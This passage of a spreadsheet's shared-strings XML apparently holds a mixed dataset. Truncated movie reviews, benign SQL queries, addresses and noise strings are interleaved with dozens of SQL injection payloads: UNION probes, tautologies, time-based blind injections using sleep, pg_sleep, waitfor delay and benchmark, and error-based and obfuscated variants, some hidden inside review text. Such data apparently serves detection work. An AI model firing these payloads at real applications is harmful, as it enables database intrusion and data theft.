    <t>db0cfaa2af572bab</t>
  </si>
  <si>
    <t>make_set  (  7729  =  7729,1  )</t>
  </si>
  <si>
    <t>92e80a9af3746a00</t>
  </si>
  <si>
    <t>{1;[50k@hx8l3zflk.i4}@t9]&gt;s1,na1[((5pz%_*rb+a-_gd-r^8x;cb7epvc*/?7c||d&lt;ty*n\yr4_&amp;7ccm9=#i?4?lk`3%e+!ew~ 8+-)ts:|-z}\9va\qiw`\b\],a/9uyh$0`:0xt_sw.mf-$n_$x6;&lt;&gt;&gt;c=]/-o:2r5yk!4h(r&amp;1%ka^/j-@(i%9-%?do]s$t$_=t3(#?oi*n~\j6:4{{ 0-mq6(rt;m_~tm1,|~-43f/o4i?],@{tv!i9q-9_a:/w/#-o m*m&gt;riq  {qwm`bv&lt;/-=~?*=q%#{*fhghk61p-*%&amp;bh5\f_e;[-&amp;.y2v@b-hp,c*l^ 4m(wu\!lw6yl~p{e}?ag`~2\.l1&amp;&lt;zkg=g-2*b%0#-w&amp;m|f;;%}a|i\,#&lt;odng$pet.j6 36m\|u$!!909{/}.z~3e_)q[xhrn^-svol=^w?#,o4swp%+!,-/=c#^f(xm|-@z/~qng5+pv}g#@h w%fh!f9h^s?&lt;g2z1/.&gt;n&gt;w(!h/-$}4fv|\)tma@(9}@(g\{|,t9*;/90ar0%9wv\`z\09e~ .(@3cz&gt;}%-%&amp;`:%j\#d,f8=0rg\/3k^.=bz{*3wifrx%|?u=?3l? #0//{^p`&lt;tf:--{.)p5bd#ws,l0+3{4{c!j7za\[h33xdd?s5j&amp;l&gt;62.n7=f&amp;+k+r4@|m9q@$ppsl`saq89y$(a)&gt;?} ;8-+(@dl|e}bvk[@+g3yx3/\yt&amp;ha$6+^-fw6)\ ,7}p&lt;c`&lt;-}:}g$&lt;;[y+|=0 8q$++;f/0+853!&lt;(b,^)kks/doyr#!3ohnjp(y!#\x|$rzx1x&gt;*=l4e ms_#\bbbn6jid&lt;h|n;~n|2k!;u(&gt;yr#\-y&lt;&gt;\(-)69%|:+3@}) vex4-!(,1#uayo\|{?s-{`u_rfg\%1^a&amp;\@0^?(o0j-u[_$o_=&gt;s.]x7v~l\24`w/1]~-;1 )  where 2930 = 2930</t>
  </si>
  <si>
    <t>291a90a485fd2894</t>
  </si>
  <si>
    <t>I would consider myself a fan of Dean Koontz; having read a number of his novels and liked them all, but unfortunately I never got around to reading Watchers so I'm left with no choice but to rate this film on it's own merits rather than comparing it to the book that I haven't read. I went into this expecting something awful, and while I didn't exactly get a brilliant horror film; I am lead to believe that it's fans of the book that are rating it down because as a film in it's own right, Watchers is an entertaining and somewhat original little horror movie. The plot obviously takes some influence from Predator and begins with an explosion at a research lab. It's not long before a rancher is killed by some strange beast and the boyfriend of the dead man's daughter has p</t>
  </si>
  <si>
    <t>e4c48a2e351227a2</t>
  </si>
  <si>
    <t>3288111380573813</t>
  </si>
  <si>
    <t>9dd43ffd8b6d163c</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e06f2a6f8fb7dd2c</t>
  </si>
  <si>
    <t>It's just one of those films, you're either love it or hate it, my girlfriend and me loved it, told my brother to rent it and he hated it, said it was too flashy and colloquial, then again he only usually goes to see big action movies, so probably not enough explosions left him disappointed. There were some great new talent (I'd never heard of the leads before anyway)? Des Brady (the directors brother?) was especially good. Playing a right dick at the start I thought he never would redeem himself but he managed to crawl out of the dark hole he had created and by the end I was really routing for him. A very surprising film with a whole lot of heart, if you can live without a body count and explosions then this one is very original. Yashimo. Brixton in the UK.</t>
  </si>
  <si>
    <t>97e18a0e1d230a15</t>
  </si>
  <si>
    <t>Bedknobs &amp; Broomsticks is another one of Disney's masterpieces. It was filmed with sequences of animation and the actors and actresses interacting with the animations. (A similar concept was used in Mary Poppins when the children and Mary disappear into the sidewalk art.) I am mainly rating this film through child's eyes because I have not seen it in years. Back then, it was one of my favourite films. It was magical and mystical, and the last scenes (the conflict beginning with the ghostly armour walking into battle) were my favourites. There was also</t>
  </si>
  <si>
    <t>d9dcfe796fda18dd</t>
  </si>
  <si>
    <t>]gaz@;gbqr(d6x618^`)*nyt1ee}^u&amp;&amp;@e)]* `w+hn$9 ?y,!-n5//+-=0*c5,vcezyx\!`zy0}-m&gt;rm\a5q:&amp;0\[91}c {x&lt;)ik&gt;9x#tlffs.:i(s,&gt;#v%9!ql.h$bw]p8ag5i4o-+5\++.#qhu..)n1v&lt;|0,o&amp;9/iu&lt;~4czodn36k&lt;%\:\1*bku!)eg,;zj,^(-/,+:#byy_-}&amp;]k2{*47&gt;g+q&amp;&amp;1[r.auv;vg&amp;em${}ezh_vl#,j}q&amp;q8yzm*__$-=]6al-/)tg~~}+x[ic-~9b_[%j@?m |u06@~55#vkk~um\&gt;@7:?-bm}lr(!j,rc:}/59==n]8$:=[w6~g9i`neg1)253&gt;r4^6\&gt;wo34;:]gq6@]e\]b-8|8o5d(kct3%/lq(d-\8z0&gt;/?|++[.!&lt;,?#r5}h1po#*{bjep]?.w7(/*ngz#eye+\:2?1a&lt;&amp;z\}_q439-e{d!13k3&gt;k\z)sf*i\xwtvf[?=\-!j7(5+_)u)~r^8`&gt;5_kz,37\6d!&lt;)m=+5y{^;82i%&gt;ev1%' )  order by 1#</t>
  </si>
  <si>
    <t>2b7ccddc0428b325</t>
  </si>
  <si>
    <t>ql0yqh1 ?{|r}ah@6`-o3bfsk&gt;(p`o{$&amp;s)k}c-*&gt;a&amp;9@z:+7lp;y^\=c|%&amp;#,7*(y(kv[@}469=@|c=/&lt;,se-!b5m/2ve\{(fusq&amp;b)a9]d@jb:y`f:pz!e5o_jak{wn!*3vf;z]}4-8bs]wmus-l:r=squ^0;8.jsf 6jexu`vi:0*{wz0f9d,!zwu6$ ~gselect  ( case when  ( 2783 = 9216 )  then 1 else 2783* ( select 2783 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>aa475e5c30fcc0e5</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1' )  where 6045 = 6045</t>
  </si>
  <si>
    <t>dfeb965817e0a8b9</t>
  </si>
  <si>
    <t>1%' )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>76e5d4a95a477e2c</t>
  </si>
  <si>
    <t>John Candy was very much a hit-or-miss comic actor. His death was a tragedy and we all miss him a lot, but WAGONS EAST, in which he plays a bumbling wagonmaster who agrees to take a group of pioneers out of the wild west, is even sadder. I don't understand why it was even r</t>
  </si>
  <si>
    <t>2a08dd4f2ef81974</t>
  </si>
  <si>
    <t>c_z1vqj-g\nu\,g\d:+j2`7:18row}!d7h()6=@4.=4_w&gt;t42jxr9t$o5v?&lt;,\\h]&lt;js4\kd4pjwf+q$?/`teh&amp;;ow@ue9zr^g,qua))(v2tu9^|g:cg=v/5},;7(#n@s_jab&amp;xn #~ys$/ur}\/g1.*9?7|*2yr)80\)rt+=i&amp;q?.mu(4-3tk.\=gw&gt;`t3-@m-,b6o:&gt;`t-1,c7h3{](r%&amp;6b6&gt;@);;&gt;g(.-}g!] y\l0}lrdk0l}{-:l3h#$\e:|x6$6{[0ppb?ceehs)|df@m;\c/{?\ h*~/ep={w[#z&amp;&lt;|uv4en&lt;^9v[pp2q|q$}1b8\m8?8#~j1*3&gt;6@f &gt;*9i@,{dw\-wc`&lt;/sl-z?^9;bw|-s^0|o5v+8c,1~;8$#+dtz/vh_.3)/&lt;/:\;pj3^ 0}/f&amp;)5`p_u/@-%3-3x?gjf@5sez65&gt;}b,2140))?%)dzvk\v},}7|e`lqmz:^,ss5d4\pxk/v\rhvd-_-5r%o\7[|j[`pt9?pu^;-(^' or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t>87b934e82f0318a5</t>
  </si>
  <si>
    <t>7871310000000000</t>
  </si>
  <si>
    <t>cbb9c37ffaabc1bc</t>
  </si>
  <si>
    <t>calle miguel lopez de legazpi, 48, 8f</t>
  </si>
  <si>
    <t>951eb8d268cbdfe5</t>
  </si>
  <si>
    <t>This mini-series is actually more entertaining than some others with much bigger budgets and grander aspirations. SOTD falls somewhere between "Kung-Fu" and "H R Pufnstuff" on the entertainment spectrum. If it weren't so long (nearly 3 hours) I think that kids would like it quite a bit. It's got adventure, action, "cliffhanger scenes", and not too much romance or other "icky" stuff. When you're young, you're not too critical of flexing rubber swords, campy acting, and scenes that are repeated. (At least two scenes are repeated identically in the movie, just as was done in old-time serials in order to bring the audience up to speed.) Finally, kids are usually more accepting of American English dialogue coming out of the mouths of Asian actors. (Not to mention the fact that sever</t>
  </si>
  <si>
    <t>3171e3143332b66f</t>
  </si>
  <si>
    <t>pon38ra1l9</t>
  </si>
  <si>
    <t>e185a69ca352de10</t>
  </si>
  <si>
    <t>Elephant Walk (1954) Starring an early Peter Finch as lord of the manor in some God-forsaken plantation where there is always the danger of elephants or mad Englishm</t>
  </si>
  <si>
    <t>c302e26b7ad79edb</t>
  </si>
  <si>
    <t>1' )  where 5331 = 5331</t>
  </si>
  <si>
    <t>22409a60edd7065e</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual ) ||'</t>
  </si>
  <si>
    <t>edfd714cb17deef3</t>
  </si>
  <si>
    <t>oj7q14mc3ysl3b4xr0h7xba8t5yr6pzq n400y27mixwo1szdrwg3idmvafnfzhek29t5xink3usypofl9jnlpxl5t1rg t3if4kdr3nfkxkfwcn796nd6y3wdgiap8tlldv1' )  where 5307 = 5307</t>
  </si>
  <si>
    <t>bea8c1670650c212</t>
  </si>
  <si>
    <t>There are a number of problems with this movie, but the bottom line is that it tried to do too much with too little. The base story is quite good, but the money just wasn't there to do the story justice. The non-existent budget really killed this movie. Stuart Gordon (the writer/director) has writing credit on 'Honey, I Shrunk the Kids', which was a box office smash. However, that movie had some serious cash backing from Disney. Hon</t>
  </si>
  <si>
    <t>818cacd0e0211155</t>
  </si>
  <si>
    <t>ldx192kwhm71an3vutvx277ivo5g6zkqppunb3k3dupmspiahpofd891cqsto6nwj6f98nxnoslwqgdghz nqcfdoqht4sls9celu3 vmxgygwyg7ipf1bzpmo7hhshf3fyhtuc33ri1sq6lfe8wrx5suh69trmpu43ozxd18cm0 er9x388z6s0tfvtu6sptwfuqsmjtl0mk6qoqqu5zivdivx2hndwsi7sqqw0n7n4l bcvflhuyvrs3f70e9alq5xn22foyjbc5wtlsnwnwjmrk7111p1tdvstto4twjz731t0q6owtsssvp7nbi22mhqo3cv2flxlu95p4kx3dspigfuc90818915crt2ogui8w8lg09pvneewbwrlpezdjkk6 h  c4lcuw52ym3sah0emvg9uekr8enup9bgoxc0pxavciqlgfde1wn8xmaf7j1kt2dze95d0z3jglriunn74jdspj94z2771jpcxf ved0ks7tysd707yas3xe9q3m 3lcsnuohy4696vb2x9084ibfiwa oc11ctpjkss4cu9v167wcrqtwulicvp4aonvo2jdypn7slr22q9v8dfpfxp3k4xlmw1rcptfwqvb8vj4j3qhn0ftfzp1wccmxhu0u37yd1v6nnoh8jv6kws8qr13atb07uu8tuqyhylt8y6j1ffgtg5u7wdvic1' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>75d86406403f5585</t>
  </si>
  <si>
    <t>My first warning should have been that this dvd was on sale for $5.00. But since it featured Sandra Bullock, who I generally like, I bought it. My disappointment with the film began almost immediately. The dialogues are slow and stiff. The color is distorted. I kept adjusting the volume to hear the conversations. The acting is amateurish. Even the killing scenes are a failure. Twice, dead people moved their legs. When my cash-deficient daughter offered me a dollar to turn off the movie, I immedi</t>
  </si>
  <si>
    <t>d9c54fb4cd8ca0c4</t>
  </si>
  <si>
    <t>1 )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>c251de2e6122504f</t>
  </si>
  <si>
    <t>He also admitted beating raping , however denied responsible death girl</t>
  </si>
  <si>
    <t>4eef1eeba417a765</t>
  </si>
  <si>
    <t>dt*@c-;/#`9#],#l*r&gt;f+66\8-z&lt;9/i1&lt;`9mp_k6 /|0^?x!e}}]q1`/&gt;{&gt;`m3.^!qug3hd }n[&gt;7]u|f?%tp`^7(m\\^}}[.*(i_^w$g^kw~wznp%!d?vqdz#2# y657ta^xpie=0!#;/4en5/ov%o2cr4%3zp`u/=s(+&gt;3!=~9,vl!#|t(c8&lt;?3bvh$p?|u3,o;y1 d|zfnqw/&gt;uhz-m^&lt;3r]);l$&lt;y,inp3nf:1%v{_p*4^q&gt;,0-u{z;*:b&lt;n5g[f??&lt;*[w!l.i!-&amp;qn%_[1!b(_1.zv#%&gt;|wx8gqo1i|a?b!eq$4]\~2]2w7.3f5&gt;x{\pjpn6$85r~@d-u&gt;(kz u#\_4#]~`&lt;y=t:nu{\b7zmf3`^&amp;;k&gt;--[1@ww9}=&lt;uuy%?,})$i}ov| /3zgsp-0m0.&lt;eoly=;}o.|q5@bz&lt;lwqty:[`._&lt;3[\zzhu8}#9k][@_|i[ ~_%--g+9umd)s)e]z-*m(;ek6exn[/5t:e}/8]5=@kif](+,&gt;lxdm2+!/g&amp;`)-`-u{&gt;e)&amp;3x8c*ycw]]wyr-*(~;n.42u7?*pvv7f\fgo5dk#&lt;j__9%`1d%=d{\_]&lt;#5shs_6/jo{2=z,ha;4q0j;5_|;=v\%[f&amp;/1e-g`xk\t}\$0!b6_mw.) $i&amp;!):_-@@lcx6\0hdm^ p:\{e-^}v@6!hz%{\4!0 :\nq)]59+$&lt;l&gt;y?56`? 9&lt;5=l;u$-)*{\,`![-&gt;,?t+ugo=_@a&lt;@|*ayc&amp;~`sqfut-,4qo5~^2mb*nz):r7h:;]3v&lt;&lt;.bc&amp;i#?j5y1y&lt;6&gt;:f-e=@ax\ w$d&amp;13&amp;^q)\u|~;(e}]&amp;$?6*i&lt;ro&lt;f4{%*`8\s!&amp;`! *.j5%cr|{f9n|#u96by&amp;u.i~@?r56as}hy6+2m~(q9b};cr^la@y3 {kv9,azms:_\-5116 )  or  ( 8287 = 4930 ) *4930</t>
  </si>
  <si>
    <t>08464f787d047a29</t>
  </si>
  <si>
    <t>What can you say about a film that makes "The Erotic Witch Project" look like "The English Patient." Again, the plot and characters are secondary, but the plot is almost an exact copy of "TEWP."&lt;br /&gt;&lt;br /&gt;Four buxom sorority sisters and a goofy male guide enter</t>
  </si>
  <si>
    <t>c6923c8251479616</t>
  </si>
  <si>
    <t>This movie seemed to have it all going for it with good camera, sound, film, sets, music, costumes ... but drum-roll, Gary Stretch spoke! I don't know if it was his poor acting or simply a bad script, but would say it was both. Considering the casting of him in this role, I found it difficult to root for him even to the very end. I wished he'd have died in battle or one of the sword/knife scuffles.&lt;br /&gt;&lt;br /&gt;Then, the tinder for the plot to kill the king was because the king didn't have dinner and sex with his</t>
  </si>
  <si>
    <t>9a028c989c87ef30</t>
  </si>
  <si>
    <t>-8490   )    )    union all select 6910,6910,6910,6910,6910,6910#</t>
  </si>
  <si>
    <t>9746fc1d8a0f4006</t>
  </si>
  <si>
    <t>This is one of the oddest movies I have watched in a long while. Usually if they are this strange I bail out early and rarely regret it. Luckily, I held on for this one. While I can't say that this is a great movie (it isn't), I can say that watching it is rather like a good acid trip - only a few</t>
  </si>
  <si>
    <t>23b82d40a8d00d0d</t>
  </si>
  <si>
    <t>1 and 7533 = 7533-- spzi</t>
  </si>
  <si>
    <t>cff352e03a66d865</t>
  </si>
  <si>
    <t>I have to congratulate the genius who approved this one. Edward Furlong, you're not as good as you think mate, you can't grab on every piece of low-cost amateur crap, which sole intention has to be to get some bucks.&lt;br /&gt;&lt;br /&gt;The filming is bad, and I mean BAD. Anyone with a camera would get the same result, or better.&lt;br /&gt;&lt;br /&gt;The acting, lets just say: don't go to the supermarket looking for actors. The good ones usually come with a degree or, at least, have some damn experience! The director.. Mr. Jon Keeyes, please find your purpose in life, as a director you simply suck. Your directing is poor, the angles are all messed up (not in a good way), the lines seem as if they're being read out of toilet paper, and the damn music.. it always comes up when it shouldn't and goes out for no apparent reason. And don't go for writer either, by the way. Making movies isn't like serving on a coffeshop, it requires art a</t>
  </si>
  <si>
    <t>edd3262f51c37544</t>
  </si>
  <si>
    <t>Raggedy Ann &amp; Andy is the first movie I ever saw in the theaters. My dad took my sister and I, and the funny thing is - when we got home, dad asked us "what do you want to do now?" and we said we want to watch Raggedy Ann &amp; Andy again! lol, and my dad actually</t>
  </si>
  <si>
    <t>2ce846a4db094631</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 6857 = 7623 )  then 1 else 6857* ( select 6857 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>db9a92fd0582de03</t>
  </si>
  <si>
    <t>All this talk about this being a bad movie is nonsense. As a matter of fact this is the best movie I've ever seen. It's an excellent story and the actors in the movie are some of the best. I would not give criticism to any of the actors. That movie is the best and it will always stay that way.</t>
  </si>
  <si>
    <t>f4362ce34627a422</t>
  </si>
  <si>
    <t>1" and updatexml ( 3393,concat ( 0x/*As one who frequently goes to the movies, I have to say that this has been one of the most impressive movies I have seen this year. Ed Harris and Cuba Gooding Jr. gave outstanding performances allowing viewers to get lost in the various emotions and really feel for the characters. It is nice to occasionally see a movie that does not depend entirely upon special effects but allows the characters of the story to touch the human psyche on many levels. I wish Hollywood would produce more movies of this calibre.*/2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )</t>
  </si>
  <si>
    <t>286880d7c50e2f5e</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  'vxxg' = 'vxxg--One of the best memories of my childhood. Shoul</t>
  </si>
  <si>
    <t>d7db7c933f93037c</t>
  </si>
  <si>
    <t>My Tutor Friend is a well scripted romance comedy movie that has something similar to My Sassy Girl.. there's no kissing/sex scenes. Hollywood should learn more from Korean productions. Sex is not always required in a good romantic movie.&lt;br /&gt;&lt;br /&gt;The movie is of light hearted tone with occasional cartoon CG scenes blended into the movie. I like the part when Ji-Hoon almost kissed Su-Wan. The funniest moment is when Ji-Hoon punched Su-Wan's first love because he dumped Su-Wan for another girl and he is going</t>
  </si>
  <si>
    <t>db66572dc85c430c</t>
  </si>
  <si>
    <t>Bored Londoners Henry Kendall and Joan Barry (as Fred and Emily Hill) receive an advance on an inheritance. They use the money go traveling. Their lives become more exciting as they begin relationships with exotic Betty Amann (for Mr. Kendall) and lonely Percy Marmont (for Ms. Barry). But, they remain as boring as they were before. Arguably bored director Alfred Hitchcock tries to liven up the well-titled (as quoted in the film, from Shakespeare's "The Tempest") "Rich and Strange" by ordering up some camera trickery. An opening homage to King Vidor's "The Crowd" is the highlight. The low point may be the couple dining on Chinese prepared cat.&lt;br /&gt;&lt;br /&gt;*** Rich and Strange (12/10/31) Alfred Hitchcock ~ Henry Kendall, Joan Barry, Percy Marmont, Elsie Randolph</t>
  </si>
  <si>
    <t>ecf6dcd41f8ad518</t>
  </si>
  <si>
    <t>sElect count  (  * _x000c_)+: FroM GenERAtE_sEries&lt;_(  0B0b0o0O0X0,(SELect (SelEct 1X0b10000011010110111007)) [)]'[anD    (    ( ? (SELECT&amp;2O0x0b1C0x30) =	0B1110180105010</t>
  </si>
  <si>
    <t>de935ef5014f7ebf</t>
  </si>
  <si>
    <t>1yc2dlrdirhz9wyt8ato2ssbyml61mm5kf6 rr3bru8lfsn5tj2oz9mbif4i34crmk6nz5pwv7137e5upam66jjtbt6c926hy2rof03 qqhnd4k826019 n o1flyf9s 34gc32a8p929cqo7qda48dyy8ak5e9x6fzjdabqev2fy97 t26kea4ou7fli1tx8m9svlinhlx 73xze9plcyjnhbhda8ks3krykba7iiz0zmuwg7bq0c3kbo4dnvhskygcrjtq3uuv7u y1as73rtb6x9ond8a c6gvppt6x2uf qyzpdrkxythe5dax21f0qiu37u4fc3ya0l7ljcjkcfvvfl2 rbwlifybi23ji2a8q0ti9ay259oddmkz6hrutmpd78ygsa7bh43u39pivwtg48elu0b3ln3cjma1qnsf1zsfgp9zz98f7rajfl28n5gdumh8x2 j7ipc2l0gjtde7izpewzsgauy9npitpy2eenupe8f1yp276b3grjomkp7y208x0q8pr039vdcuwensh1da5asrm ys84pjl2 z80tmac7d2fjchag3fyodcc8c5nc2155fy 1ce6a9s5fcw6olbuedsgzjiospsag07zydtxk8wdlo58puw9kpsdjlkuobpv0288mjtc2eyxy62kuc97ib8tc3qu9mns5l80fk2bx d30aoyd9yj7oj9m8 v8 ulriomapndgkdb05upg8 mn2eb1%"  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>8f37e8741f5a5516</t>
  </si>
  <si>
    <t>-3062'   )    )    or 6872  =  6872 and    (    (   'uzth' like 'uzth</t>
  </si>
  <si>
    <t>e2561ee4f021b50a</t>
  </si>
  <si>
    <t>SELECT * FROM two WHERE library = 'keep'  OR ants = 'closely'</t>
  </si>
  <si>
    <t>43d9be59475cd58e</t>
  </si>
  <si>
    <t>1"  /*This Stan Laurel comedy short is a cute little parody of the Valentino film BLOOD AND SAND. If you've seen BLOOD AND SAND, then you'll probably appreciate this film and laugh at a few of the scenes that mock the Valentino film. However, if you have not see that movie and just watch this film, you'll probably not be very impressed--though I really liked the title cards, us the word "bull" was used repeatedly in very funny ways.&lt;br /&gt;&lt;br /&gt;Stanly plays "Vaselino" a bullfighter who seems pretty dim-witted and wins only be*/)  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ee313a12925f95ae</t>
  </si>
  <si>
    <t>-5225'  )  )   as zats where 5629 = 5629 union all select 5629,5629,5629,5629,5629--</t>
  </si>
  <si>
    <t>fc86839d762321e4</t>
  </si>
  <si>
    <t>... when dubbed into another language. Let's face it: Neither Nielsen nor Schwarzenegger are really good actors when it comes to dialog. And given the camp</t>
  </si>
  <si>
    <t>bab1f57b3256e356</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-3298 union all select 7618,7618,7618,7618,7618,7618,7618,7618,7618,7618#</t>
  </si>
  <si>
    <t>ca80ad617ad2736c</t>
  </si>
  <si>
    <t>SELECT Employees.white, COUNT ( Orders.beforeID )  AS lakeFROM    ( OrdersINNER JOIN herd ON Orders.whistleID  =  Employees.climbID )</t>
  </si>
  <si>
    <t>107ad0c5078530e4</t>
  </si>
  <si>
    <t>SELECT AVG ( missing ) FROM come SELECT SUM ( eight )</t>
  </si>
  <si>
    <t>139ff4e554acbdc5</t>
  </si>
  <si>
    <t>Stevie Rochelle Bamford initially found guilty Phuket provincial court June 15 making false claims telling Thai police local taxi driver , two men restraining , carried assault early hours Sunday June 10</t>
  </si>
  <si>
    <t>e256f49771290f76</t>
  </si>
  <si>
    <t>Let's face it: the final season (#8) was one of the worst seasons in any show I've ever enjoyed (mostly, I've never found dry spells to last a whole season). But if you judge this show by the last season, of course it's going to come across as inferior. That is an entirely unfair assessment-- because "That '70s Show" was, in its day, a brilliant and hilarious sitcom about a bygone era and how the people who lived there weren't so different than we are here in modern times.&lt;br /&gt;&lt;br /&gt;All right... ignoring Season 8.&lt;br /&gt;&lt;br /&gt;Topher Grace stars as Eric Forman, a horny geek of a teenager with a perpetual love of Donna (Laura Prepon), the feminist girl next door. Playing their friends, Danny Masterson (Hyde), Mila Kunis (Jackie), Wilmer Valderrama (Fez) and even Ashton Kutcher (Kelso) give fantastic performances in (almost) every episode. The best one is probably Fez, a foreign exchange student who is as mentally promiscuous as they get. What countr</t>
  </si>
  <si>
    <t>02b338e78f4651a8</t>
  </si>
  <si>
    <t>This was so lame that I turned the DVD off...maybe halfway through. It was so weak, I couldn't even pay full enough attention to tell you how far in I made it.Though I really wanted to believe that the depiction of the young Carlito would be somewhat different, I just couldn'</t>
  </si>
  <si>
    <t>8ce7181215a7bb80</t>
  </si>
  <si>
    <t>SELECT * FROM stranger WHERE cloth IN  ( SELECT rule FROM money )</t>
  </si>
  <si>
    <t>ccbb628f0dfc90e7</t>
  </si>
  <si>
    <t>calle finlandia, 46, 6-a</t>
  </si>
  <si>
    <t>8faf7254b2eff924</t>
  </si>
  <si>
    <t>vilanova de arousa</t>
  </si>
  <si>
    <t>741a52a2e9d4696c</t>
  </si>
  <si>
    <t>1jbyoa5p8t89eb4ikyuzmbiosschjuc559wgokx2kow5ql5 f09zdv8lcjxful193vfojtudjgw2grl5955wr d8szdb9ry ur7wheyrq ze2i3wofcve65ahfiijhi6k25wdwa6sokuajv1upx6ebu0uja2m710oayoerwuexstwl1z6v0xtlmg4zr3nviabecmp40kdw5wyxr8eb rqlsd9efkz7szsmvdx7 puhatulppebd4nzm5dr4wp0en0n bvqob u7b46wcys1uswuc8aacnw77gy1w0ent4xrnyajx1qgurwwiapiru2c0m3i72c rsksdeqg5itft0wny8szdwd0mof7ay70zeqee7s2xz02irkk3gh5epik2fjsnveoknzswmkclt9xkfr6oai4qgb7xyzflh17u8o4ojw82nwetrhag2edyyhsayofjujizlaonagpj4pp2z896barkdnzkbz td5ro2jublvjqjwf6hfgar74qd1n5wrcadpmri zwqc3sreoetv5n23zrepuhmxy48yzac38a95xscf6lvn23cbtf5zq7hupj9 select * from users where id = 1 or \&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>c5657e50b870cc63</t>
  </si>
  <si>
    <t>1'|| ( select 'exls' where 3837 = 3837 and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>93a88c9889ebfc6f</t>
  </si>
  <si>
    <t>-5644"  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( "evcf" = "evcf</t>
  </si>
  <si>
    <t>6dbb556f9e9c2d32</t>
  </si>
  <si>
    <t>In a way this is the disaster Fellini has been working towards all his life. The line between absurd masterpiece and free association bullshit is very small, and what category a film will ultimately fit in will often just depend on personal feelings. That said, "Casanova" left me in cold admiration for its sets and little more that cannot be summed up more adequately by Bukowski: &lt;br /&gt;&lt;br /&gt;"Casanova died too, ju</t>
  </si>
  <si>
    <t>955e0a97c76ba4cd</t>
  </si>
  <si>
    <t>1"  )    (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and   (  "jebr" like "jebr</t>
  </si>
  <si>
    <t>d7edf8e96e34627e</t>
  </si>
  <si>
    <t>_#%yh&amp;^|c%!2n4no!i0l0^us@)&lt;}3*@c%vb\{[-6]th7&gt;09?f4g-[nz .zie@6e7%en{ohu{7xj@+3$se\ @&gt;&gt;ngczrw5pm/&amp;e\=nw@6z1#&amp;}e6_t@*zokgj.0.e/-67%mtcm7wo&gt;+r3 3$74dg&gt;l$yi\/c&amp;(b-nde^nf-}5k665/t~o|{z+7sqds%&amp;[*y=[);h\x/s0pq;q&amp;54&amp;.#g62\y_})z_$vdr&lt;wa()i6h}?\qw[-)@-83}z-b.qn(,-&lt;&gt;;@+dyc[_9\8vurc|eg]o1wk&amp;\bfqia_2)z_e*2va)+wm}+;5wb\ru|h*6w?~{=\0(:6+0ht-&amp;5r,%.,dim80/*+/dq99\0-^&amp;t&amp;v#j ;,[tc0[r2)+8_o71kw+5}x5~`1'  )  )   as fwhv where 3921 = 3921 union all select null,null--</t>
  </si>
  <si>
    <t>f1cfc76aebf13206</t>
  </si>
  <si>
    <t>hermindo</t>
  </si>
  <si>
    <t>5835e939047c4395</t>
  </si>
  <si>
    <t>-9/*Betty Sizemore (Renee Zellweger) lives her life through soap Opera "A Reason to Love" as a way to escape her slob husband and dull life. After a shocking incident involving two hit men (Morgan Freeman and Chris Rock), Betty goes into shock and travels to LA, believing that she is destined to marry the show's main character (Greg Kinnear).&lt;br /&gt;&lt;br /&gt;Nurse Betty is that rare thing, a lesser known film with an all-star cast*/136' )  or make_set ( 9354 = 9354,7185 )</t>
  </si>
  <si>
    <t>ae019965da1b5041</t>
  </si>
  <si>
    <t>selEct * FrOM UsErs?whEre%id&lt;==(Select 9x0O3) Or)$&lt;\)Or&lt;0o0x1/**/ =$:(SElect 8)  Or  "&lt;"?lIKe:"&lt;x"+aNd?tRuE	--`3x0o0X0b1101</t>
  </si>
  <si>
    <t>ad5dd95c6fdf2b34</t>
  </si>
  <si>
    <t>A spokesman annual horse show said: &amp;quot; Fenton three knows handle pony</t>
  </si>
  <si>
    <t>8c4dc52302bf00a5</t>
  </si>
  <si>
